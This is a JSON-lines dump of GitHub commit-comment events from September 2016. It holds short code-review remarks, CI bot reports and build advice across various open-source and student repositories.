{"id":"4583717778","type":"CommitCommentEvent","actor":{"login":"tdelhomme"},"repo":{"name":"IARCbioinfo/needlestack"},"payload":{"comment":{"id":19079780,"position":null,"line":null,"path":null,"commit_id":"91ac222137fb8fd226cd7c054a96ffa1ac691768","created_at":"2016-09-19T14:44:40Z","updated_at":"2016-09-19T14:44:40Z","body":"fixes #107 "}},"created_at":"2016-09-19T14:44:40Z"}
{"id":"4583719293","type":"CommitCommentEvent","actor":{"login":"kostya"},"repo":{"name":"kostya/crystal-benchmarks-game"},"payload":{"comment":{"id":19079784,"position":85,"line":99,"path":"README.md","commit_id":"f5a82a51708468bb1d6a3f938257f83ba83519fe","created_at":"2016-09-19T14:44:54Z","updated_at":"2016-09-19T14:44:54Z","body":"@asterite O_o"}},"created_at":"2016-09-19T14:44:54Z"}
{"id":"4583719676","type":"CommitCommentEvent","actor":{"login":"tdelhomme"},"repo":{"name":"IARCbioinfo/needlestack"},"payload":{"comment":{"id":19079786,"position":null,"line":null,"path":null,"commit_id":"c06398713cf6f3c10f3acc14703cc5056103126a","created_at":"2016-09-19T14:44:58Z","updated_at":"2016-09-19T14:44:58Z","body":"fixes #107 \r\n"}},"created_at":"2016-09-19T14:44:58Z"}
{"id":"4583720785","type":"CommitCommentEvent","actor":{"login":"tdelhomme"},"repo":{"name":"IARCbioinfo/needlestack"},"payload":{"comment":{"id":19079790,"position":null,"line":null,"path":null,"commit_id":"c0c1066053b705aeed56ebf46378bd06be2e014d","created_at":"2016-09-19T14:45:11Z","updated_at":"2016-09-19T14:45:11Z","body":"fixes #107 \r\n"}},"created_at":"2016-09-19T14:45:11Z"}
{"id":"4583722363","type":"CommitCommentEvent","actor":{"login":"tdelhomme"},"repo":{"name":"IARCbioinfo/needlestack"},"payload":{"comment":{"id":19079795,"position":null,"line":null,"path":null,"commit_id":"8fe4a04f053cc6ee00a04a4e17fbd7b7a81fdc0f","created_at":"2016-09-19T14:45:27Z","updated_at":"2016-09-19T14:45:27Z","body":"fixes #107 "}},"created_at":"2016-09-19T14:45:27Z"}
{"id":"4583723981","type":"CommitCommentEvent","actor":{"login":"tdelhomme"},"repo":{"name":"IARCbioinfo/needlestack"},"payload":{"comment":{"id":19079802,"position":null,"line":null,"path":null,"commit_id":"94de704b7b13943d7e0c2bf1664881977fb228f9","created_at":"2016-09-19T14:45:44Z","updated_at":"2016-09-19T14:45:44Z","body":"fixes #107 "}},"created_at":"2016-09-19T14:45:44Z"}
{"id":"4583724850","type":"CommitCommentEvent","actor":{"login":"MumuLi0519"},"repo":{"name":"MumuLi0519/censorify"},"payload":{"comment":{"id":19079806,"position":null,"line":null,"path":null,"commit_id":"a241f96ecb339033366e172287038857ad60190b","created_at":"2016-09-19T14:45:53Z","updated_at":"2016-09-19T14:45:53Z","body":"11"}},"created_at":"2016-09-19T14:45:53Z"}
{"id":"4583725463","type":"CommitCommentEvent","actor":{"login":"tdelhomme"},"repo":{"name":"IARCbioinfo/needlestack"},"payload":{"comment":{"id":19079808,"position":null,"line":null,"path":null,"commit_id":"5a385e1c22de538bc0f287febdc3348fed726f36","created_at":"2016-09-19T14:45:58Z","updated_at":"2016-09-19T14:45:58Z","body":"fixes #107 "}},"created_at":"2016-09-19T14:45:58Z"}
{"id":"4583730103","type":"CommitCommentEvent","actor":{"login":"gharlan"},"repo":{"name":"redaxo/redaxo"},"payload":{"comment":{"id":19079823,"position":15,"line":141,"path":"redaxo/src/core/lib/response.php","commit_id":"173ef7ce9b371fbd37c0b15f5dd70121b919dff1","created_at":"2016-09-19T14:46:47Z","updated_at":"2016-09-19T14:46:47Z","body":"jupp"}},"created_at":"2016-09-19T14:46:47Z"}
{"id":"4583731716","type":"CommitCommentEvent","actor":{"login":"agroves333"},"repo":{"name":"FormidableLabs/nuka-carousel"},"payload":{"comment":{"id":19079825,"position":56,"line":403,"path":"src/carousel.js","commit_id":"6cc20be2a3e23b017ac2efb5bec550ecc2c045bf","created_at":"2016-09-19T14:47:04Z","updated_at":"2016-09-19T14:47:04Z","body":"This is being called twice, once for each of these conditions, and another at the bottom of this method. Should we remove the original beforeSlide(), setState to currentSlide, and afterSlide logic below?\r\n"}},"created_at":"2016-09-19T14:47:04Z"}
{"id":"4583732657","type":"CommitCommentEvent","actor":{"login":"jsight"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19079830,"position":32,"line":23,"path":"README.md","commit_id":"133853aab91372f640fbe8e438e90e978301fe96","created_at":"2016-09-19T14:47:15Z","updated_at":"2016-09-19T14:47:15Z","body":"Technically it is unnecessary. However, for the first run, it sometimes useful for a couple of reasons. The logging is easier to read when it isn't in the middle of a maven build. If things aren't quite right with your environment, running it once manually is the easiest way to find that out. \r\n\r\nAlso, sometimes npm dependencies aren't so great.  I have occasionally had one demand user input on the first install and that won't work when inside of Maven on the first run. I'm not sure that any still have that problem, though."}},"created_at":"2016-09-19T14:47:15Z"}
{"id":"4583735088","type":"CommitCommentEvent","actor":{"login":"contra"},"repo":{"name":"contra/glob-loader"},"payload":{"comment":{"id":19079837,"position":5,"line":8,"path":"index.js","commit_id":"d600b60bbd574def12be4a7b57adc554dc0f4559","created_at":"2016-09-19T14:47:39Z","updated_at":"2016-09-19T14:47:39Z","body":"@joscha - got a link to docs for that? made a guess, the webpack API is crazy"}},"created_at":"2016-09-19T14:47:39Z"}
{"id":"4583737091","type":"CommitCommentEvent","actor":{"login":"jsight"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19079849,"position":2,"line":2,"path":"scripts/eap-setup.cli","commit_id":"81f69ed8cdf447424edf8d1938c91b2adc063274","created_at":"2016-09-19T14:47:59Z","updated_at":"2016-09-19T14:47:59Z","body":"I think something more generic would be better. It may not always just be jms related commands."}},"created_at":"2016-09-19T14:47:59Z"}
{"id":"4583737659","type":"CommitCommentEvent","actor":{"login":"kaptain-kavern"},"repo":{"name":"kaptain-kavern/CK_AnimalPlant_Pack"},"payload":{"comment":{"id":19079851,"position":null,"line":null,"path":null,"commit_id":"022f2490eb401b5a53cdaf3d9523969ccf62dd8a","created_at":"2016-09-19T14:48:06Z","updated_at":"2016-09-19T14:48:06Z","body":"The problem here is the label you changed will be used even for the crop variety of this plant too.\r\n\r\nWhat I can try to do is having a wild variety that is called \"wild\" and keep the vanilla \"crop\" version also in parallel "}},"created_at":"2016-09-19T14:48:06Z"}
{"id":"4583743802","type":"CommitCommentEvent","actor":{"login":"michaeljota"},"repo":{"name":"akveo/ng2-admin"},"payload":{"comment":{"id":19079873,"position":null,"line":null,"path":null,"commit_id":"3ff5c51f1a89ad10869447a919ff272321d9d768","created_at":"2016-09-19T14:49:04Z","updated_at":"2016-09-19T14:49:04Z","body":"Did you tried with `entryComponents` and `viewProviders` before start to modulize it? I tried it, and it give me not issue compiling it, but it trows me errors when serving it. One error actually. "}},"created_at":"2016-09-19T14:49:04Z"}
{"id":"4583743922","type":"CommitCommentEvent","actor":{"login":"jsight"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19079874,"position":5,"line":31,"path":"README.md","commit_id":"c09a985f3f79d6a7996106a9e26c0c38a7abe6e5","created_at":"2016-09-19T14:49:06Z","updated_at":"2016-09-19T14:49:06Z","body":"Yes"}},"created_at":"2016-09-19T14:49:06Z"}
{"id":"4583745001","type":"CommitCommentEvent","actor":{"login":"geraldb"},"repo":{"name":"openfootball/it-italy"},"payload":{"comment":{"id":19079877,"position":null,"line":null,"path":null,"commit_id":"7d61bce8074e5c34c0b7298dc5eadc69d1b59c0e","created_at":"2016-09-19T14:49:19Z","updated_at":"2016-09-19T14:49:19Z","body":"@noso2k1 Thanks for the 4^ Giornata update. Keep it up. FYI: Will try to (auto-) update the standings later today (and the football.json) Cheers."}},"created_at":"2016-09-19T14:49:19Z"}
{"id":"4583752180","type":"CommitCommentEvent","actor":{"login":"jsight"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19079906,"position":19,"line":41,"path":"README.md","commit_id":"81356054193c0c56a2978931dba9bba95fbb1905","created_at":"2016-09-19T14:50:35Z","updated_at":"2016-09-19T14:50:35Z","body":"It might be possible to use the one installed via npm locally, but I haven't tried it."}},"created_at":"2016-09-19T14:50:35Z"}
{"id":"4583755841","type":"CommitCommentEvent","actor":{"login":"dmitryd"},"repo":{"name":"dmitryd/typo3-realurl"},"payload":{"comment":{"id":19079917,"position":null,"line":null,"path":null,"commit_id":"36166de3ce47c2cc8d6ef450f80ca8127d6b7bbd","created_at":"2016-09-19T14:51:14Z","updated_at":"2016-09-19T14:51:14Z","body":"No forecast."}},"created_at":"2016-09-19T14:51:14Z"}
{"id":"4583761070","type":"CommitCommentEvent","actor":{"login":"LDVSOFT"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19079928,"position":15,"line":15,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-19T14:52:08Z","updated_at":"2016-09-19T14:52:08Z","body":"Ну так, если мы хотим, чтобы значение всегда было, надо указать `NOT NULL`."}},"created_at":"2016-09-19T14:52:08Z"}
{"id":"4583766874","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19079942,"position":32,"line":218,"path":"otrv4.md","commit_id":"651d0995dfbdc3744f15e49c346124f29e542790","created_at":"2016-09-19T14:53:03Z","updated_at":"2016-09-19T14:53:03Z","body":"Can this be in a message struct maybe, that also details the size for fixed-size fields? "}},"created_at":"2016-09-19T14:53:03Z"}
{"id":"4583769804","type":"CommitCommentEvent","actor":{"login":"caiqinghua"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":19079948,"position":null,"line":null,"path":null,"commit_id":"9f5c641a4006bd71bf4c2d76c7446cb6e6bfce49","created_at":"2016-09-19T14:53:34Z","updated_at":"2016-09-19T14:53:34Z","body":"@laanwj and this is another similar question. http://bitcoin.stackexchange.com/questions/43761/bitcoin-zeromq-and-scala-application"}},"created_at":"2016-09-19T14:53:34Z"}
{"id":"4583769932","type":"CommitCommentEvent","actor":{"login":"juniorz"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19079950,"position":14,"line":200,"path":"otrv4.md","commit_id":"651d0995dfbdc3744f15e49c346124f29e542790","created_at":"2016-09-19T14:53:36Z","updated_at":"2016-09-19T14:53:36Z","body":"Is `HKDF` RFC 5869? There's an implementation for golang here: https://godoc.org/golang.org/x/crypto/hkdf"}},"created_at":"2016-09-19T14:53:36Z"}
{"id":"4583779079","type":"CommitCommentEvent","actor":{"login":"onodera-punpun"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19079979,"position":null,"line":null,"path":null,"commit_id":"358e309bdb9ab01d7aea786b29d608a21033915c","created_at":"2016-09-19T14:55:09Z","updated_at":"2016-09-19T14:55:09Z","body":"We can use the gentoo mirror: https://dev.gentoo.org/~radhermit/dist/moreutils-0.60.tar.gz"}},"created_at":"2016-09-19T14:55:09Z"}
{"id":"4583780903","type":"CommitCommentEvent","actor":{"login":"jsight"},"repo":{"name":"windup/windup-web"},"payload":{"comment":{"id":19079983,"position":10,"line":24,"path":"README.md","commit_id":"81356054193c0c56a2978931dba9bba95fbb1905","created_at":"2016-09-19T14:55:28Z","updated_at":"2016-09-19T14:55:28Z","body":"Well, you can configure npm to use your home folder for its global installations. That is probably the best way to do it.\r\n\r\nHaving said that, just doing \"sudo npm\" isn't as bad as people tend to think that it is. npm uses the \"nobody\" user to build when run as root."}},"created_at":"2016-09-19T14:55:28Z"}
{"id":"4583780961","type":"CommitCommentEvent","actor":{"login":"joscha"},"repo":{"name":"contra/glob-loader"},"payload":{"comment":{"id":19079984,"position":5,"line":8,"path":"index.js","commit_id":"d600b60bbd574def12be4a7b57adc554dc0f4559","created_at":"2016-09-19T14:55:28Z","updated_at":"2016-09-19T14:55:28Z","body":"@contra I just reread that again when searching the docs for it: https://webpack.github.io/docs/loaders.html#cacheable - I just noticed I misunderstood, so all good (except now I need to adapt my PR)!"}},"created_at":"2016-09-19T14:55:28Z"}
{"id":"4583782026","type":"CommitCommentEvent","actor":{"login":"juniorz"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19079988,"position":20,"line":206,"path":"otrv4.md","commit_id":"651d0995dfbdc3744f15e49c346124f29e542790","created_at":"2016-09-19T14:55:39Z","updated_at":"2016-09-19T14:55:39Z","body":"I read this as \"HMAC(C0) should be split into MKenc and MKmac\", but how to split. In half?"}},"created_at":"2016-09-19T14:55:39Z"}
{"id":"4583782879","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19079992,"position":15,"line":15,"path":"Unit One/src/com/bayviewglen/addressbookmap/AddressBookWithMap.java","commit_id":"9ac1524835a17634872e08c9bd7e980fcdda6e90","created_at":"2016-09-19T14:55:48Z","updated_at":"2016-09-19T14:55:48Z","body":"No need for default constructor."}},"created_at":"2016-09-19T14:55:48Z"}
{"id":"4583786657","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19080005,"position":null,"line":null,"path":null,"commit_id":"7d496e5cb49ee489ef00fbfeb46dd01695a8bfa8","created_at":"2016-09-19T14:56:26Z","updated_at":"2016-09-19T14:56:26Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/496/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2003)."}},"created_at":"2016-09-19T14:56:26Z"}
{"id":"4583786960","type":"CommitCommentEvent","actor":{"login":"the7winds"},"repo":{"name":"LDVSOFT/spbau-term5-sql"},"payload":{"comment":{"id":19080007,"position":15,"line":15,"path":"script.sql","commit_id":"bd5955552ce7da333472d70826383a8eab1bc2a9","created_at":"2016-09-19T14:56:29Z","updated_at":"2016-09-19T14:56:29Z","body":"@LDVSOFT, а разве мы не хотим?"}},"created_at":"2016-09-19T14:56:29Z"}
{"id":"4583792441","type":"CommitCommentEvent","actor":{"login":"juniorz"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19080018,"position":48,"line":234,"path":"otrv4.md","commit_id":"651d0995dfbdc3744f15e49c346124f29e542790","created_at":"2016-09-19T14:57:23Z","updated_at":"2016-09-19T14:57:23Z","body":"Same question. How to split?"}},"created_at":"2016-09-19T14:57:23Z"}
{"id":"4583799198","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19080035,"position":5,"line":191,"path":"otrv4.md","commit_id":"651d0995dfbdc3744f15e49c346124f29e542790","created_at":"2016-09-19T14:58:31Z","updated_at":"2016-09-19T14:58:31Z","body":"Maybe think about creating a message flow diagram and what information is sent, similar to the AKE sections. "}},"created_at":"2016-09-19T14:58:31Z"}
{"id":"4583799229","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson3"},"payload":{"comment":{"id":19080036,"position":11,"line":11,"path":"src/CountWords.java","commit_id":"bfee6ad4e427fe8b8799f82e7b5efb56858633ab","created_at":"2016-09-19T14:58:31Z","updated_at":"2016-09-19T14:58:31Z","body":"HashSet<String> words\r\nследует заменить на Set<String> words\r\nТем, кто использует words не смысла знать то, как реализован интерфейс Set"}},"created_at":"2016-09-19T14:58:31Z"}
{"id":"4583808567","type":"CommitCommentEvent","actor":{"login":"Markenson"},"repo":{"name":"projeto-siga/siga"},"payload":{"comment":{"id":19080058,"position":null,"line":null,"path":null,"commit_id":"7641ecff16070731660f6ad2954828d589c8be27","created_at":"2016-09-19T15:00:01Z","updated_at":"2016-09-19T15:00:01Z","body":"Por causa do flyway (https://flywaydb.org/). O flyway executa os scripts em sequência para gerar o banco de dados. Se a gente apagar o script 35 e criar o próximo com esse mesmo número, quem já criou o banco de dados terá problemas. Se a gente simplesmente \"pular\" e criar diretamente o script nº 36, pode causar confusão do \"buraco\" deixado na posição 35. Para evitar isso, simplesmente comentamos os scripts que devem ser desativados."}},"created_at":"2016-09-19T15:00:01Z"}
{"id":"4583809021","type":"CommitCommentEvent","actor":{"login":"onodera-punpun"},"repo":{"name":"6c37/crux-ports"},"payload":{"comment":{"id":19080059,"position":null,"line":null,"path":null,"commit_id":"9d7dfa966e66dfc2278d0061d13f6c232234a601","created_at":"2016-09-19T15:00:07Z","updated_at":"2016-09-19T15:00:07Z","body":"Please use tabs to indent :), I also usually add some blank lines between \"build procedures\" to make Pkgfiles a bit more readable, like:\r\n\r\n```\r\ncd $name-$version\r\n\r\nmake\r\nmake DESTDIR=$PKG PREFIX=/usr MANPREFIX=/usr/man install\r\n\r\n# Write access only for root\r\nchmod 644 $PKG/usr/man/man1/sxhkd.1\r\n```"}},"created_at":"2016-09-19T15:00:07Z"}
{"id":"4583809732","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson3"},"payload":{"comment":{"id":19080062,"position":19,"line":19,"path":"src/CountWords.java","commit_id":"bfee6ad4e427fe8b8799f82e7b5efb56858633ab","created_at":"2016-09-19T15:00:17Z","updated_at":"2016-09-19T15:00:17Z","body":"Можно было использовать String.split"}},"created_at":"2016-09-19T15:00:17Z"}
{"id":"4583811472","type":"CommitCommentEvent","actor":{"login":"ElementalPanda"},"repo":{"name":"DonkeyCake/Transport"},"payload":{"comment":{"id":19080070,"position":6,"line":28,"path":"Transport/Form1.cs","commit_id":"eeeaef2d340653932b594ba7513db3bbc6741684","created_at":"2016-09-19T15:00:36Z","updated_at":"2016-09-19T15:00:36Z","body":"***Butts***"}},"created_at":"2016-09-19T15:00:36Z"}
{"id":"4583812794","type":"CommitCommentEvent","actor":{"login":"ElementalPanda"},"repo":{"name":"DonkeyCake/Transport"},"payload":{"comment":{"id":19080073,"position":8,"line":30,"path":"Transport/Form1.cs","commit_id":"eeeaef2d340653932b594ba7513db3bbc6741684","created_at":"2016-09-19T15:00:49Z","updated_at":"2016-09-19T15:00:49Z","body":"***Butts***"}},"created_at":"2016-09-19T15:00:49Z"}
{"id":"4583813598","type":"CommitCommentEvent","actor":{"login":"ElementalPanda"},"repo":{"name":"DonkeyCake/Transport"},"payload":{"comment":{"id":19080076,"position":10,"line":32,"path":"Transport/Form1.cs","commit_id":"eeeaef2d340653932b594ba7513db3bbc6741684","created_at":"2016-09-19T15:00:58Z","updated_at":"2016-09-19T15:00:58Z","body":"***Butts***"}},"created_at":"2016-09-19T15:00:58Z"}
{"id":"4583813956","type":"CommitCommentEvent","actor":{"login":"ElementalPanda"},"repo":{"name":"DonkeyCake/Transport"},"payload":{"comment":{"id":19080077,"position":11,"line":33,"path":"Transport/Form1.cs","commit_id":"eeeaef2d340653932b594ba7513db3bbc6741684","created_at":"2016-09-19T15:01:02Z","updated_at":"2016-09-19T15:01:02Z","body":"***Butts***"}},"created_at":"2016-09-19T15:01:02Z"}
{"id":"4583818916","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"ubccpsc/classportal"},"payload":{"comment":{"id":19080094,"position":null,"line":null,"path":null,"commit_id":"d8256e9087cb250818ee665ab4252db6c01542e7","created_at":"2016-09-19T15:01:54Z","updated_at":"2016-09-19T15:01:54Z","body":"That's a good question. I would say that GroupRepoDescription should only contain groups who have all members registered with Github Ids. It should include both groups that already have their url set along with those that don't. So instead of propagating an error because of incomplete data (which we're totally going to see) it would just not pass along 'incomplete' groups. \r\n\r\nI'll work on this today while I roll out the first set of teams."}},"created_at":"2016-09-19T15:01:54Z"}
{"id":"4583824146","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19080108,"position":48,"line":284,"path":"src/utils/linearAlg2D.h","commit_id":"72f09d3fa00cd7087b3372843fdc8da2f93c59fd","created_at":"2016-09-19T15:02:50Z","updated_at":"2016-09-19T15:02:50Z","body":"The same happens when building on 64-bit"}},"created_at":"2016-09-19T15:02:50Z"}
{"id":"4583824261","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"sberjava/Lesson3"},"payload":{"comment":{"id":19080109,"position":11,"line":11,"path":"src/CountWords.java","commit_id":"bfee6ad4e427fe8b8799f82e7b5efb56858633ab","created_at":"2016-09-19T15:02:51Z","updated_at":"2016-09-19T15:02:51Z","body":"В данной задаче не было смысла выносить переменные count и words в качестве членов класса."}},"created_at":"2016-09-19T15:02:51Z"}
{"id":"4583825913","type":"CommitCommentEvent","actor":{"login":"rigidus"},"repo":{"name":"StrangeTcy/rigidus.ru"},"payload":{"comment":{"id":19080112,"position":7,"line":31,"path":"content/why-hypergraphs.org","commit_id":"250f95327270e3e3d1ffc69eeb5bf17ac4c728a9","created_at":"2016-09-19T15:03:09Z","updated_at":"2016-09-19T15:03:09Z","body":"аргументов"}},"created_at":"2016-09-19T15:03:09Z"}
{"id":"4583829704","type":"CommitCommentEvent","actor":{"login":"chrisseaton"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19080124,"position":13,"line":568,"path":"core/src/main/java/org/jruby/Ruby.java","commit_id":"1cc0d6a94cb13c46f0bc35bfcca8c000ead622dc","created_at":"2016-09-19T15:03:49Z","updated_at":"2016-09-19T15:03:49Z","body":"I think we always leave via an exception so it's probably ok, but the code should make this clear. I'll do this next week."}},"created_at":"2016-09-19T15:03:49Z"}
{"id":"4583832909","type":"CommitCommentEvent","actor":{"login":"LeonardoGaldino"},"repo":{"name":"pet-informatica/CinQuest"},"payload":{"comment":{"id":19080133,"position":null,"line":null,"path":null,"commit_id":"0d2f4727c7c302d72bb74e07eb6fd283271420bb","created_at":"2016-09-19T15:04:24Z","updated_at":"2016-09-19T15:04:24Z","body":"quebrou ?"}},"created_at":"2016-09-19T15:04:24Z"}
{"id":"4583833143","type":"CommitCommentEvent","actor":{"login":"Markenson"},"repo":{"name":"projeto-siga/siga"},"payload":{"comment":{"id":19080134,"position":5,"line":14,"path":"sigasr/src/main/resources/db/migration/SIGASR_UTF8_V00000000000000000002_0__Description.sql","commit_id":"0150ed77328db072c135c40423662c893592c886","created_at":"2016-09-19T15:04:26Z","updated_at":"2016-09-19T15:04:26Z","body":"Esse não haveria problema em apagar"}},"created_at":"2016-09-19T15:04:26Z"}
{"id":"4583834154","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19080138,"position":null,"line":null,"path":null,"commit_id":"e804892844b323fadab8d643a5f7b16f29dbf20b","created_at":"2016-09-19T15:04:37Z","updated_at":"2016-09-19T15:04:37Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/497/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2003)."}},"created_at":"2016-09-19T15:04:37Z"}
{"id":"4583836930","type":"CommitCommentEvent","actor":{"login":"raphaelpaiva"},"repo":{"name":"projeto-siga/siga"},"payload":{"comment":{"id":19080148,"position":null,"line":null,"path":null,"commit_id":"7641ecff16070731660f6ad2954828d589c8be27","created_at":"2016-09-19T15:05:04Z","updated_at":"2016-09-19T15:05:04Z","body":"Entendi. Legal o uso do flyway!\r\n\r\nUma sugestão seria utilizar o flyway só pra mudanças estruturais no banco e outra ferramenta (ou arquivo) para carregar os dados estáticos (ou iniciais). Evitaria esse tipo de confusão.\r\n\r\nO que acha?"}},"created_at":"2016-09-19T15:05:04Z"}
{"id":"4583847798","type":"CommitCommentEvent","actor":{"login":"drdanz"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":19080167,"position":null,"line":null,"path":null,"commit_id":"b3bb5f1361a4b11f6d93ba235c4464c74eaf6c85","created_at":"2016-09-19T15:07:00Z","updated_at":"2016-09-19T15:07:00Z","body":"Just to clarify... YARP is not supposed to install CMake helpers modules, except for the ones required to use YARP stuff, we have YCM for that. So, either add them to YCM (if they are not there already) and have cer depend on YCM, or copy them into cer repository."}},"created_at":"2016-09-19T15:07:00Z"}
{"id":"4583851117","type":"CommitCommentEvent","actor":{"login":"Revanth97"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19080174,"position":null,"line":null,"path":null,"commit_id":"9f6ecedecc7d9601c72a3019b4b69b02ed0fb269","created_at":"2016-09-19T15:07:34Z","updated_at":"2016-09-19T15:07:34Z","body":"@MKRISH547 It's better to create your own repo and keep uploading the source codes for the given exercises day to day into your repo. That's what I am doing."}},"created_at":"2016-09-19T15:07:34Z"}
{"id":"4583854270","type":"CommitCommentEvent","actor":{"login":"NitroxydeX"},"repo":{"name":"EternalBlueFlame/Traincraft-5"},"payload":{"comment":{"id":19080182,"position":null,"line":null,"path":null,"commit_id":"1a4936110f7e1fd47b2f8570de7c20b11d7b1fda","created_at":"2016-09-19T15:08:08Z","updated_at":"2016-09-19T15:08:08Z","body":"I was really dumb. LOL Second fix for #156 "}},"created_at":"2016-09-19T15:08:08Z"}
{"id":"4583856142","type":"CommitCommentEvent","actor":{"login":"MKRISH547"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19080184,"position":null,"line":null,"path":null,"commit_id":"9f6ecedecc7d9601c72a3019b4b69b02ed0fb269","created_at":"2016-09-19T15:08:29Z","updated_at":"2016-09-19T15:08:29Z","body":"K\n\nOn 19 Sep 2016 8:37 p.m., \"Revanth Murigipudi\" <notifications@github.com>\nwrote:\n\n> @MKRISH547 <https://github.com/MKRISH547> It's better to create your own\n> repo and keep uploading the source codes for the given exercises day to day\n> into your repo. That's what I am doing.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Akash-Sinha/AndroidTraining-2016-17/commit/9f6ecedecc7d9601c72a3019b4b69b02ed0fb269#commitcomment-19080174>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVMD3RUbXITfOqHkm1tb28_4GnwsqWfZks5qrqU2gaJpZM4KANR1>\n> .\n>\n"}},"created_at":"2016-09-19T15:08:29Z"}
{"id":"4583856985","type":"CommitCommentEvent","actor":{"login":"litespeedtech"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19080189,"position":505,"line":1088,"path":"sapi/litespeed/lsapi_main.c","commit_id":"413bd261ec9fd53466990bf09dc84647e2407d2c","created_at":"2016-09-19T15:08:36Z","updated_at":"2016-09-19T15:08:36Z","body":"Thanks for pointing it out. Fixed with new commit. "}},"created_at":"2016-09-19T15:08:36Z"}
{"id":"4583858187","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.discussion"},"payload":{"comment":{"id":19080193,"position":null,"line":null,"path":null,"commit_id":"fe9dc300564437c3b3b2466c3acc0feb82ebf137","created_at":"2016-09-19T15:08:48Z","updated_at":"2016-09-19T15:08:48Z","body":"@mauritsvanrees Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.discussion/88/violations\n```\nplone/app/discussion/browser/moderation.py:109:17: W503 line break before binary operator\nplone/app/discussion/browser/moderation.py:192:17: W503 line break before binary operator\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-19T15:08:48Z"}
{"id":"4583864666","type":"CommitCommentEvent","actor":{"login":"leeight"},"repo":{"name":"square/okhttp"},"payload":{"comment":{"id":19080208,"position":35,"line":100,"path":"okhttp-urlconnection/src/main/java/okhttp3/JavaNetCookieJar.java","commit_id":"ed43e07ffb3bb95708fe9840cf9fc2f523b2f1e5","created_at":"2016-09-19T15:09:53Z","updated_at":"2016-09-19T15:09:53Z","body":"It looks like the browser not drop the quotes and have better compatibility."}},"created_at":"2016-09-19T15:09:53Z"}
{"id":"4583867415","type":"CommitCommentEvent","actor":{"login":"rolivia"},"repo":{"name":"plasma-umass/Fission"},"payload":{"comment":{"id":19080216,"position":5,"line":47,"path":"jvm/src/main/scala/RhinoToQuark.scala","commit_id":"a90079807d43e0278a30bff2ee96a0bd46069a97","created_at":"2016-09-19T15:10:27Z","updated_at":"2016-09-19T15:10:27Z","body":"I'll change the name.  This is the method I use to parse eval strings.  I pass in all of the variables that are in scope, but I have to remove window and global because otherwise variables will be parsed as window.<variable> or global.<variable> (because of how the curVars thing works)."}},"created_at":"2016-09-19T15:10:27Z"}
{"id":"4583868625","type":"CommitCommentEvent","actor":{"login":"hujg"},"repo":{"name":"hujg/pay"},"payload":{"comment":{"id":19080220,"position":null,"line":null,"path":null,"commit_id":"07366bcd1b7fc8661c0ce7e3f16139184b41a41f","created_at":"2016-09-19T15:10:37Z","updated_at":"2016-09-19T15:10:37Z","body":"xxx"}},"created_at":"2016-09-19T15:10:37Z"}
{"id":"4583871801","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19080226,"position":null,"line":null,"path":null,"commit_id":"466ba4f9327ce589d9011d89c435a1983b635646","created_at":"2016-09-19T15:11:11Z","updated_at":"2016-09-19T15:11:11Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=21)"}},"created_at":"2016-09-19T15:11:11Z"}
